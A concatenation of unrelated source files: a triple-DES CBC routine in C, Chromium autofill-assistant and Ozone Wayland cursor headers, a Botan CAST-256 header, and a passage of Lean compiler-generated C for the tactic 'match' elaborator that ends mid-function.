data[0]=l; data[1]=r; } void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3) { register DES_LONG l,r; l=data[0]; r=data[1]; IP(l,r); data[0]=l; data[1]=r; DES_encrypt2((DES_LONG *)data,ks3,DES_DECRYPT); DES_encrypt2((DES_LONG *)data,ks2,DES_ENCRYPT); DES_encrypt2((DES_LONG *)data,ks1,DES_DECRYPT); l=data[0]; r=data[1]; FP(r,l); data[0]=l; data[1]=r; } #ifndef DES_DEFAULT_OPTIONS #undef CBC_ENC_C__DONT_UPDATE_IV #include "ncbc_enc.i" /* DES_ncbc_encrypt */ void DES_ede3_cbc_encrypt(const unsigned char *input, unsigned char *output, long length, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3, DES_cblock *ivec, int enc) { register DES_LONG tin0,tin1; register DES_LONG tout0,tout1,xor0,xor1; register const unsigned char *in; unsigned char *out; register long l=length; DES_LONG tin[2]; unsigned char *iv; in=input; out=output; iv = &(*ivec)[0]; if (enc) { c2l(iv,tout0); c2l(iv,tout1); for (l-=8; l>=0; l-=8) { c2l(in,tin0); c2l(in,tin1); tin0^=tout0; tin1^=tout1; tin[0]=tin0; tin[1]=tin1; DES_encrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; l2c(tout0,out); l2c(tout1,out); } if (l != -8) { c2ln(in,tin0,tin1,l+8); tin0^=tout0; tin1^=tout1; tin[0]=tin0; tin[1]=tin1; DES_encrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; l2c(tout0,out); l2c(tout1,out); } iv = &(*ivec)[0]; l2c(tout0,iv); l2c(tout1,iv); } else { register DES_LONG t0,t1; c2l(iv,xor0); c2l(iv,xor1); for (l-=8; l>=0; l-=8) { c2l(in,tin0); c2l(in,tin1); t0=tin0; t1=tin1; tin[0]=tin0; tin[1]=tin1; DES_decrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; tout0^=xor0; tout1^=xor1; l2c(tout0,out); l2c(tout1,out); xor0=t0; xor1=t1; } if (l != -8) { c2l(in,tin0); c2l(in,tin1); t0=tin0; t1=tin1; tin[0]=tin0; tin[1]=tin1; DES_decrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; tout0^=xor0; tout1^=xor1; l2cn(tout0,tout1,out,l+8); xor0=t0; xor1=t1; } iv = &(*ivec)[0]; l2c(xor0,iv);
/* write back the second half of the CBC IV, then scrub the sensitive
 * locals before returning. */
l2c(xor1,iv); } tin0=tin1=tout0=tout1=xor0=xor1=0; tin[0]=tin[1]=0; } #endif /* DES_DEFAULT_OPTIONS */
// Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #define COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #include <vector> #include "base/callback.h" #include "components/autofill/core/browser/data_model/autofill_profile.h" #include "components/autofill/core/browser/data_model/credit_card.h" #include "components/autofill_assistant/browser/action_value.pb.h" #include "components/autofill_assistant/browser/actions/action_delegate.h" #include "components/autofill_assistant/browser/client_status.h" #include "components/autofill_assistant/browser/service.pb.h" #include "components/autofill_assistant/browser/user_data.h" #include "components/autofill_assistant/browser/web/element_finder.h" #include "components/autofill_assistant/browser/website_login_manager.h" namespace autofill_assistant { namespace user_data { // Validate the completeness of a contact. std::vector<std::string> GetContactValidationErrors( const autofill::AutofillProfile* profile, const CollectUserDataOptions& collect_user_data_options); // Sorts the given contacts based on completeness, and returns a vector of // indices in sorted order. Full contacts will be ordered before empty ones, // and for equally complete contacts, this falls back to sorting based on last // used. std::vector<int> SortContactsByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Contact>>& contacts); // Get the default selection for the current list of contacts. Returns -1 if no // default selection is possible. int GetDefaultContact(const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Contact>>& contacts); // Validate the completeness of a shipping address. 
std::vector<std::string> GetShippingAddressValidationErrors( const autofill::AutofillProfile* profile, const CollectUserDataOptions& collect_user_data_options); // Sorts the given addresses based on completeness, and returns a vector of // indices in sorted order. Full addresses will be ordered before empty ones, // and for equally complete profiles, this falls back to sorting based on // last used. std::vector<int> SortShippingAddressesByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Address>>& addresses); // Get the default selection for the current list of addresses. Returns -1 if no // no default selection is possible. int GetDefaultShippingAddress( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Address>>& addresses); std::vector<std::string> GetPaymentInstrumentValidationErrors( const autofill::CreditCard* credit_card, const autofill::AutofillProfile* billing_address, const CollectUserDataOptions& collect_user_data_options); // Sorts the given payment instruments by completeness, and returns a vector // of payment instrument indices in sorted order. Full payment instruments will // be ordered before empty ones, and for equally complete payment instruments, // this falls back to sorting based on the full name on the credit card. std::vector<int> SortPaymentInstrumentsByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<PaymentInstrument>>& payment_instruments); // Get the default selection for the current list of payment instruments. // Returns -1 if no default selection is possible. int GetDefaultPaymentInstrument( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<PaymentInstrument>>& payment_instruments); std::unique_ptr<autofill::AutofillProfile> MakeUniqueFromProfile( const autofill::AutofillProfile& profile); // Compare contact fields only. 
This comparison checks a subset of // AutofillProfile::Compare. Falls back to comparing the GUIDs if nothing else // is to be compared. bool CompareContactDetails( const CollectUserDataOptions& collect_user_data_options, const autofill::AutofillProfile* a, const autofill::AutofillProfile* b); // Get a formatted client value. The replacement is treated as strict, // meaning a missing value will lead to a failed ClientStatus. // This method returns: // - INVALID_ACTION, if the value is empty. // - INVALID_ACTION, if a profile is provided and it is empty. // - PRECONDITION_FAILED, if the requested profile is not found. // - AUTOFILL_INFO_NOT_AVAILABLE, if a key from an AUtofill source cannot be // resolved. // - CLIENT_MEMORY_KEY_NOT_AVAILABLE, if a key from the client memory cannot be // resolved. // - EMPTY_VALUE_EXPRESSION_RESULT, if the result is an empty string. // - ACTION_APPLIED otherwise. ClientStatus GetFormattedClientValue(const AutofillValue& autofill_value, const UserData& user_data, std::string* out_value); ClientStatus GetFormattedClientValue( const AutofillValueRegexp& autofill_value_regexp, const UserData& user_data, std::string* out_value); // Get a password manager value from the |UserData|. Returns the user name // directly and resolves the password from the |WebsiteLoginManager|. If the // login credentials do not exist, fails with |PRECONDITION_FAILED|. If the // origin of the |target_element| does not match the origin of the login // credentials, fails with |PASSWORD_ORIGIN_MISMATCH|. void GetPasswordManagerValue( const PasswordManagerValue& password_manager_value, const ElementFinder::Result& target_element, const UserData* user_data, WebsiteLoginManager* website_login_manager, base::OnceCallback<void(const ClientStatus&, const std::string&)> callback); // Retrieve a single string value stored in |UserData| under // |client_memory_key|. If the value is not present or not a single string, // fails with |PRECONDITION_FAILED|. 
ClientStatus GetClientMemoryStringValue(const std::string& client_memory_key, const UserData* user_data, std::string* out_value); // Take a |text_value| and resolve its content to a string. Reports the result // through the |callback|. void ResolveTextValue( const TextValue& text_value, const ElementFinder::Result& target_element, const ActionDelegate* action_delegate, base::OnceCallback<void(const ClientStatus&, const std::string&)> callback); } // namespace user_data } // namespace autofill_assistant #endif // COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_
/* * CAST-256 * (C) 1999-2007 Jack Lloyd * * Botan is released under the Simplified BSD License (see license.txt) */ #ifndef BOTAN_CAST256_H__ #define BOTAN_CAST256_H__ #include <botan/block_cipher.h> namespace Botan { /** * CAST-256 */ class BOTAN_DLL CAST_256 final : public Block_Cipher_Fixed_Params<16, 4, 32, 4> { public: void encrypt_n(const byte in[], byte out[], size_t blocks) const override; void decrypt_n(const byte in[], byte out[], size_t blocks) const override; void clear() override; std::string name() const override { return "CAST-256"; } BlockCipher* clone() const override { return new CAST_256; } private: void key_schedule(const byte[], size_t) override; secure_vector<u32bit> m_MK; secure_vector<byte> m_RK; }; } #endif
// Copyright 2014 Intel Corporation. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #define OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #include "ui/base/cursor/ozone/cursor_factory_ozone.h" namespace ui { class CursorFactoryOzoneWayland : public CursorFactoryOzone { public: CursorFactoryOzoneWayland(); virtual ~CursorFactoryOzoneWayland(); virtual PlatformCursor GetDefaultCursor(int type) OVERRIDE; virtual PlatformCursor CreateImageCursor(const SkBitmap& bitmap, const gfx::Point& hotspot) OVERRIDE; virtual void RefImageCursor(PlatformCursor cursor) OVERRIDE; virtual void UnrefImageCursor(PlatformCursor cursor) OVERRIDE; virtual void SetCursor(gfx::AcceleratedWidget widget, PlatformCursor cursor) OVERRIDE; }; } // namespace ui #endif // OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_
// Lean compiler output // Module: Lean.Elab.Tactic.Match // Imports: Init Lean.Parser.Term Lean.Elab.Match Lean.Elab.Tactic.Basic Lean.Elab.Tactic.Induction #include <lean/lean.h> #if defined(__clang__) #pragma clang diagnostic ignored "-Wunused-parameter" #pragma clang diagnostic ignored "-Wunused-label" #elif defined(__GNUC__) && !defined(__CLANG__) #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wunused-label" #pragma GCC diagnostic ignored "-Wunused-but-set-variable" #endif #ifdef __cplusplus extern "C" { #endif lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_object*); size_t l_USize_add(size_t, size_t); extern lean_object* l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_getMainTag(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_LocalDecl_userName(lean_object*); extern lean_object* l_Lean_nullKind; lean_object* l_Lean_Elab_Tactic_adaptExpander___lambda__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* lean_name_mk_string(lean_object*, lean_object*); uint8_t l_USize_decEq(size_t, size_t); lean_object* lean_array_uget(lean_object*, size_t); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg(lean_object*, lean_object*); lean_object* l_Array_append___rarg(lean_object*, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* 
l_Lean_Elab_throwUnsupportedSyntax___rarg___closed__1; lean_object* l_Lean_SourceInfo_fromRef(lean_object*); lean_object* l_ReaderT_bind___at_Lean_Elab_Tactic_liftMetaMAtMain___spec__1___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* lean_array_uset(lean_object*, size_t, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_withMacroExpansionInfo___at_Lean_Elab_Tactic_adaptExpander___spec__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__8; lean_object* l_Lean_Elab_Tactic_AuxMatchTermState_cases___default; size_t l_USize_sub(size_t, size_t); extern lean_object* l_Array_empty___closed__1; lean_object* lean_st_ref_get(lean_object*, lean_object*); lean_object* l_Lean_mkIdentFrom(lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1(lean_object*); lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at_Lean_Elab_Tactic_evalIntro___spec__1___rarg(lean_object*, lean_object*, lean_object*); 
lean_object* lean_array_push(lean_object*, lean_object*); lean_object* lean_array_get_size(lean_object*); lean_object* l_Lean_Elab_Tactic_withMainContext___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__2; lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Elab_Term_initFn____x40_Lean_Elab_Match___hyg_7269____closed__1; lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4; size_t l_USize_shiftRight(size_t, size_t); lean_object* lean_string_utf8_byte_size(lean_object*); lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1___boxed(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Term_getMainModule___rarg(lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_1481____closed__8; uint8_t l_USize_decLt(size_t, size_t); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__13; lean_object* lean_nat_add(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2; lean_object* 
l_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object*); extern lean_object* l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); uint8_t lean_nat_dec_eq(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(lean_object*, lean_object*, size_t, size_t, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_groupKind___closed__2; lean_object* lean_st_ref_take(lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; lean_object* lean_nat_sub(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; uint8_t l_Lean_Elab_Term_isAuxDiscrName(lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; lean_object* l_Lean_Meta_tryClear(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_stx___x3f___closed__3; lean_object* l_Lean_Elab_Tactic_evalMatch_match__1(lean_object*); lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(lean_object*, 
lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Syntax_getHeadInfo(lean_object*); lean_object* l_Lean_replaceRef(lean_object*, lean_object*); lean_object* lean_array_get(lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Util_0__Lean_Elab_expandMacro_x3f___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3; lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Syntax_setKind(lean_object*, lean_object*); lean_object* l_Lean_Name_appendIndexAfter(lean_object*, lean_object*); lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1; extern lean_object* l___private_Lean_Elab_Tactic_Basic_0__Lean_Elab_Tactic_sortFVarIds___closed__1; extern lean_object* l_myMacro____x40_Init_Notation___hyg_13352____closed__13; lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(lean_object*, lean_object*); lean_object* l_Lean_Elab_Term_getCurrMacroScope(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); size_t l_USize_shiftLeft(size_t, size_t); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1; lean_object* l_Lean_Elab_Tactic_getMainGoal(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(lean_object*, lean_object*, lean_object*, lean_object*, 
lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1; extern lean_object* l_Lean_Parser_Tactic_paren___closed__1; size_t lean_usize_of_nat(lean_object*); extern lean_object* l_Lean_Elab_Tactic_tacticElabAttribute; lean_object* l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default; lean_object* l_Lean_addMacroScope(lean_object*, lean_object*, lean_object*); size_t l_USize_land(size_t, size_t); lean_object* l_Lean_LocalDecl_fvarId(lean_object*); extern lean_object* l_Lean_nullKind___closed__2; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6___boxed(lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_18957____closed__5; lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_refine___closed__1; lean_object* l_Lean_Elab_Tactic_evalMatch_match__1___rarg(lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_refine___closed__2; lean_object* l_Lean_Syntax_setArg(lean_object*, lean_object*, lean_object*); lean_object* lean_environment_main_module(lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__10; uint8_t lean_nat_dec_le(lean_object*, lean_object*); lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_case___closed__1; lean_object* l_Lean_Syntax_getArgs(lean_object*); lean_object* l_Lean_Name_append(lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_object* l_Lean_Elab_Tactic_evalMatch(lean_object*, 
lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_match___elambda__1___closed__1; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(lean_object*, size_t, size_t, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1; extern lean_object* l_Lean_Parser_Tactic_case___closed__2; lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1___boxed(lean_object*, lean_object*, lean_object*); lean_object* lean_st_ref_set(lean_object*, lean_object*, lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(lean_object*, size_t, size_t, lean_object*); lean_object* l_Lean_addMessageContextFull___at_Lean_Meta_instAddMessageContextMetaM___spec__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1; lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed(lean_object*); lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(lean_object*, size_t, size_t, lean_object*); uint8_t l_Lean_Syntax_isOfKind(lean_object*, lean_object*); extern lean_object* l_prec_x28___x29___closed__7; lean_object* l_Lean_Elab_Tactic_replaceMainGoal(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_prec_x28___x29___closed__3; lean_object* l_Lean_Syntax_getArg(lean_object*, lean_object*); extern lean_object* l_Lean_mkOptionalNode___closed__2; lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(lean_object*, lean_object*, lean_object*); lean_object* 
l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_unsafeCast(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(lean_object*); lean_object* lean_usize_to_nat(size_t); lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2___boxed(lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2; lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4___boxed(lean_object*, lean_object*); uint8_t lean_nat_dec_lt(lean_object*, lean_object*); extern lean_object* l_Std_PersistentArray_getAux___rarg___closed__1; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { uint8_t x_5; x_5 = x_2 == x_3; if (x_5 == 0) { lean_object* x_6; lean_object* x_7; size_t x_8; size_t x_9; x_6 = lean_array_uget(x_1, x_2); x_7 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_6, x_4); lean_dec(x_6); x_8 = 1; x_9 = x_2 + x_8; x_2 = x_9; x_4 = x_7; goto _start; } else { return x_4; } } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { uint8_t x_5; x_5 = x_2 == x_3; if (x_5 == 0) { lean_object* x_6; size_t x_7; size_t x_8; x_6 = lean_array_uget(x_1, x_2); x_7 = 1; x_8 = x_2 + x_7; if 
(lean_obj_tag(x_6) == 0) { x_2 = x_8; goto _start; } else { lean_object* x_10; lean_object* x_11; uint8_t x_12; x_10 = lean_ctor_get(x_6, 0); lean_inc(x_10); lean_dec(x_6); x_11 = l_Lean_LocalDecl_userName(x_10); x_12 = l_Lean_Elab_Term_isAuxDiscrName(x_11); if (x_12 == 0) { lean_dec(x_10); x_2 = x_8; goto _start; } else { lean_object* x_14; lean_object* x_15; x_14 = l_Lean_LocalDecl_fvarId(x_10); lean_dec(x_10); x_15 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_15, 0, x_14); lean_ctor_set(x_15, 1, x_4); x_2 = x_8; x_4 = x_15; goto _start; } } } else { return x_4; } } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(lean_object* x_1, lean_object* x_2) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_3; lean_object* x_4; lean_object* x_5; uint8_t x_6; x_3 = lean_ctor_get(x_1, 0); x_4 = lean_array_get_size(x_3); x_5 = lean_unsigned_to_nat(0u); x_6 = lean_nat_dec_lt(x_5, x_4); if (x_6 == 0) { lean_dec(x_4); return x_2; } else { uint8_t x_7; x_7 = lean_nat_dec_le(x_4, x_4); if (x_7 == 0) { lean_dec(x_4); return x_2; } else { size_t x_8; size_t x_9; lean_object* x_10; x_8 = 0; x_9 = lean_usize_of_nat(x_4); lean_dec(x_4); x_10 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_3, x_8, x_9, x_2); return x_10; } } } else { lean_object* x_11; lean_object* x_12; lean_object* x_13; uint8_t x_14; x_11 = lean_ctor_get(x_1, 0); x_12 = lean_array_get_size(x_11); x_13 = lean_unsigned_to_nat(0u); x_14 = lean_nat_dec_lt(x_13, x_12); if (x_14 == 0) { lean_dec(x_12); return x_2; } else { uint8_t x_15; x_15 = lean_nat_dec_le(x_12, x_12); if (x_15 == 0) { lean_dec(x_12); return x_2; } else { size_t x_16; size_t x_17; lean_object* x_18; x_16 = 0; x_17 = lean_usize_of_nat(x_12); lean_dec(x_12); x_18 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_11, x_16, x_17, x_2); return x_18; } } } } } lean_object* 
l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_5; size_t x_6; lean_object* x_7; lean_object* x_8; lean_object* x_9; size_t x_10; size_t x_11; size_t x_12; size_t x_13; size_t x_14; size_t x_15; lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; uint8_t x_20; x_5 = lean_ctor_get(x_1, 0); x_6 = x_2 >> x_3 % (sizeof(size_t) * 8); x_7 = lean_usize_to_nat(x_6); x_8 = l_Std_PersistentArray_getAux___rarg___closed__1; x_9 = lean_array_get(x_8, x_5, x_7); x_10 = 1; x_11 = x_10 << x_3 % (sizeof(size_t) * 8); x_12 = x_11 - x_10; x_13 = x_2 & x_12; x_14 = 5; x_15 = x_3 - x_14; x_16 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_9, x_13, x_15, x_4); lean_dec(x_9); x_17 = lean_unsigned_to_nat(1u); x_18 = lean_nat_add(x_7, x_17); lean_dec(x_7); x_19 = lean_array_get_size(x_5); x_20 = lean_nat_dec_lt(x_18, x_19); if (x_20 == 0) { lean_dec(x_19); lean_dec(x_18); return x_16; } else { uint8_t x_21; x_21 = lean_nat_dec_le(x_19, x_19); if (x_21 == 0) { lean_dec(x_19); lean_dec(x_18); return x_16; } else { size_t x_22; size_t x_23; lean_object* x_24; x_22 = lean_usize_of_nat(x_18); lean_dec(x_18); x_23 = lean_usize_of_nat(x_19); lean_dec(x_19); x_24 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_5, 